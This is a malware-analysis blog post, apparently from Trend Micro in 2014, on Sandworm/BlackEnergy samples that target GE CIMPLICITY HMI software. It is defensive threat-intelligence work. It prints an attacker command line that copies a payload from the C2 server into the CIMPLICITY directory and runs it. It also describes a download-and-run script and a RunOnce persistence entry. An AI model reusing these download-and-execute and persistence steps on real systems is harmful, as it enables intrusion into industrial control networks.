Sandworm to Blacken: The SCADA Connection

On October 14th, a report was publicly released regarding the Sandworm team.  After beginning an investigation into the affiliated malware samples and domains, we quickly came to realization that this group is very likely targeting SCADA-centric victims who are using GE Intelligent Platform’s CIMPLICITY HMI solution suite.   We have observed this team utilizing .cim and .bcl files as attack vectors, both of which file types are used by the CIMPLICITY software.  As further proof of the malware targeting CIMPILICITY, it drops files into the CIMPLICITY installation directory using the %CIMPATH% environment variable on the victim machines.

Figure 1. Strings showing environment variable

CIMPLICITY is an application suite that is used in conjunction with SCADA systems.  A key component of any SCADA system is the HMI. The HMI (which stands for Human-Machine interface) can be viewed as an operator console that is used to monitor and control devices in an industrial environment. These devices can be responsible for automation control as well as safety operations.

Figure 2 below shows an example of where HMIs can be found in an electric power delivery system. Additionally, you may find HMIs in the corporate network that are being used for design, development, and testing.

Figure 2. Sample SCADA System

It is important to note that we are currently seeing CIMPLICITY being used as an attack vector; however, we have found no indication that this malware is manipulating any actual SCADA systems or data. Since HMIs are located in both the corporate and control networks, this attack could be used to target either network segment, or used to cross from the corporate to the control network.

What Drew Our Attention?

When looking closer at the recent Sandworm Team report, we started to pivot off several of the C2’s that were identified in the report. Again, we aren’t aware of any attacks against SCADA devices directly utilizing anything that we discuss below.

One of the C2’s that drew our immediate attention was 94[.]185[.]85[.]122. We pivoted off this C2, and located a file called config.bak. (SHA1 hash: c931be9cd2c0bd896ebe98c9304fea9e) This file piqued our interest right off the bat, because it is a CimEdit/CimView file. A CimEdit/CimView file is an object oriented file for GE’s Cimplicity SCADA software suite, used to administer SCADA devices.

Figure 3. CimView/CimEdit Example

In config.bak, there are two events that are defined: OnOpenExecCommand and ScreenOpenDispatch.

The handler of the OnOpenExecCommand is the following command line:

cmd.exe /c "copy \\94.185.85.122\public\default.txt "%CIMPATH%\CimCMSafegs.exe" && start "WOW64" "%CIMPATH%\CimCMSafegs.exe"

It’s important to note the variable %CIMPATH% for the drop location of default.txt. This is a standard variable that Cimplicity uses for its installs. The handler of ScreenOpenDispatch is the subroutine start(). The subroutine start() downloads the file from hxxp://94.185.85.122/newsfeed.xml,  and saves it to {random 41 character hex string}.wsf, executes the downloaded file using cscript.exe, deletes the file after execution, and terminates the current process. We currently don’t have a sample of newsfeed.xml that can be analyzed for further detail.

This event mechanism does not seem to exploit vulnerabilities. It’s comparable to AutoOpen and AutoExec in MS Office. In addition to config.bak being a CimEdit/CimView file, there is a reference to devlist.cim, which is a Cimpack Design Drawing File.

The default.txt file copied from the C2 in the above command structure drops and execute %Startup%\flashplayerapp.exe, then deletes itself after execution. Flashplayerapp.exe is capable of issuing the following commands:

  • exec
  • lexec
  • die
  • getup
  • turnoff
  • chprt

In addition to config.bak and default.txt being of interest, another file- shell.bcl (MD5: bdc7fafc26bee0e5e75b521a89b2746d) drew our attention. It is a script designed to run in the Basic Control Engine. bcd files are heavily throughout SCADA systems to automate certain functions. In Cimplicity, bcl files are used for creating scripts to help automate functions. Shell.bcl executes \ \94.185.85.122\public\xv.exe directly.

Based on the strings in shell.bcl, xv.exe is supposed to exploit a system vulnerability. We don’t currently have a copy or hash of xv.exe available to confirm this assumption.

Open Directories

During the course of regular threat intelligence gathering, we often look closer at the C2 server that attackers are using to communicate and drop/upload files to and from victim machines.  In the case of 94[.]185[.]85[.]122, in addition to config.bak, we were able to pull down additional malware files that the particular actors were using from the C2. A few of the notable files found on the C2 can be found below. These files may or may not have been used in conjunction with attacks involving SCADA devices.
Spiskideputatovdone.ppsx  (MD5 330e8d23ab82e8a0ca6d166755408eb1), which means deputy list in Russian, has been tied to an email address >oleh.tiahnybok@vosvoboda.info, based on VirusTotal submissions. is a PPSX file that downloads/loads \ \ 94[.]185[.]85[.]122\public\slide1.gif and \ \ 94[.]185[.]85[.]122\public\slides.inf (MD5:d41d8cd98f00b204e9800998ecf8427e). The downloaded slide.inf renames the local slide1.gif to slide1.gif.exe and adds the registry entry HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce Install=”{dir}\slide1.gif.exe” Oleh Tiahnybok is a Ukrainian politician with outspoken anti-Russian views.

Slide1.gif.exe (d41d8cd98f00b204e9800998ecf8427e) drops FONTCACHE.DAT  (MD5:2f6582797bbc34e4df47ac25e363571d) and deletes itself after execution. In addition, FONTCACHE.DAT is a version of the Black Energy bot capable of executing the following commands against the system:

  • delete
  • ldplg
  • unlplg
  • update
  • dexec
  • exec
  • updcfg

Conclusion

As we have seen, these are pieces of a very complex targeted attack that is seemingly focusing on GE Intelligent Platform CIMPLICITY users.  We have, at present, found no indications that this malware is actually manipulating physical SCADA systems or their resultant data.  As we continue the investigation into this targeted attack, be sure to check back as we will keep you up to date on our findings. All of the samples listed in this blog are currently caught by Trend Micro under the name BKDR_BLACKEN.A and BKDR_BLACKEN.B.

Special Thanks to the entire FTR Team and Christopher Daniel So

Post from: Trendlabs Security Intelligence Blog – by Trend Micro

Sandworm to Blacken: The SCADA Connection

Read more: Sandworm to Blacken: The SCADA Connection

Story added 17. October 2014, content source with full text you can find at link above.